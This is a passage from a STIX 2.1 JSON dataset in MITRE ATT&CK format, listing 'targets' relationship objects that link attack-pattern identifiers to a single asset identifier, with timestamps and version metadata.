"x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--815cf40e-d0e9-480b-9b6c-08414d1474d6", "created": "2024-07-01T10:37:15.818657", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818659", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7aff8d27-0522-407d-98cb-5bc8192fec2f", "created": "2024-07-01T10:37:15.818667", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818669", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--637903a8-3f30-42f1-8a6a-d197ede476cb", "created": "2024-07-01T10:37:15.818677", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818679", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1f8cbfad-ad8c-4f9f-8b8d-05fd38a3588a", "created": "2024-07-01T10:37:15.818689", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818691", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b967298-6d57-41f6-b22b-ebff6fe1f15f", "created": "2024-07-01T10:37:15.818699", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818701", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d962a7b5-1915-4c94-bd76-ad94189f6e59", "created": "2024-07-01T10:37:15.818710", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818712", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--644b29a1-a437-4023-8733-15441346bc74", "created": "2024-07-01T10:37:15.818720", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818722", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--def4d631-d2b2-498d-b738-38fad9f4abc5", "created": "2024-07-01T10:37:15.818730", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818732", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f0b88824-8580-48ad-bd66-e82cec2a5e19", "created": "2024-07-01T10:37:15.818740", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818743", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d8482da-ce13-44c3-9e27-6e99ca1e8070", "created": "2024-07-01T10:37:15.818751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--36172dd7-7301-45f9-8512-84b9d0aed359", "created": "2024-07-01T10:37:15.818761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dcb4d4e3-67a7-4aee-8505-f0c21e91d8ab", "created": "2024-07-01T10:37:15.818771", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818774", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--371e4867-8b95-442e-b7f9-ea05f9d5b731", "created": "2024-07-01T10:37:15.818781", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818784", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7e0738f6-0807-4c13-94de-2ec658b7b953", "created": "2024-07-01T10:37:15.818792", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818794", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--681c50b2-f453-4b26-bae2-7d58d90094f0", "created": "2024-07-01T10:37:15.818802", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818804", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1ad0924b-ee59-4e01-ba93-96a43c8c6e92", "created": "2024-07-01T10:37:15.818812", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818814", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74dcb186-4179-40f8-9422-12c0475da5f6", "created": "2024-07-01T10:37:15.818823", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818825", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ac5d57ba-4338-4b12-bfd1-c706509e1a7b", "created": "2024-07-01T10:37:15.818833", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818835", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57c86559-a7c9-4917-8e01-ff8af678a008", "created": "2024-07-01T10:37:15.818843", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818845", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b4459f2-d9a0-4169-9eb6-aa4980bec4ad", "created": "2024-07-01T10:37:15.818853", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818855", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc599aa3-8f19-4961-b236-3eeb10ce989f", "created": "2024-07-01T10:37:15.818863", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818865", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a8656975-1a03-43ec-8ded-1af6396a1902", "created": "2024-07-01T10:37:15.818873", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818876", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2a470b7-03e2-4e54-b285-2663c115779e", "created": "2024-07-01T10:37:15.818884", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818886", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d1f1e622-5ad7-476d-8113-a5860d0d6705", "created": "2024-07-01T10:37:15.818894", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818896", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a13a11da-84df-4dee-86d4-2ad89db6bd1d", "created": "2024-07-01T10:37:15.818904", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818906", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cae7b7d9-21d9-42bc-a11b-5bf21054d021", "created": "2024-07-01T10:37:15.818914", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818916", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--418d88b2-1472-4a88-a4e1-b59ea97d40c5", "created": "2024-07-01T10:37:15.818924", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818927", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2cea5a85-8698-41dd-8ab9-d80005812cf6", "created": "2024-07-01T10:37:15.818935", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818937", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ccfab625-831d-42ed-9fd1-06da76178b17", "created": "2024-07-01T10:37:15.818945", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818947", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f3896d69-0162-46a8-9777-a9650f4f93ac", "created": "2024-07-01T10:37:15.818955", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818957", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7e440d9b-6aaf-45d6-b3fc-5ec40191b3f2", "created": "2024-07-01T10:37:15.818965", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818967", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ddb35cc6-9271-40ef-95bb-5520814757e4", "created": "2024-07-01T10:37:15.818975", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818978", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe76c9d0-dc41-4383-9cf8-a0e801698e05", "created": "2024-07-01T10:37:15.818986", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818988", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6015a8df-7341-4079-8115-32757bb192f5", "created": "2024-07-01T10:37:15.818996", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818998", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5320bd79-5a73-4190-ab73-551ffde9822e", "created": "2024-07-01T10:37:15.819006", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819008", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--729fb234-ebb0-4e8d-ac8d-ad821224fc28", "created": "2024-07-01T10:37:15.819016", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819018", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c79be558-cd21-4a7a-9045-3d07ee869deb", "created": "2024-07-01T10:37:15.819026", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819029", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--227f4255-0420-44b3-9a3c-062a87625f6d", "created": "2024-07-01T10:37:15.819037", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819039", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5d5ae72-5288-4474-93dd-42c6875d10e4", "created": "2024-07-01T10:37:15.819047", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819049", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1c33e9b-760f-4599-90fa-82fdc460988b", "created": "2024-07-01T10:37:15.819057", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819059", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0bac90b7-9754-4b27-9f7f-26a71a86bccd", "created": "2024-07-01T10:37:15.819067", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819069", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": 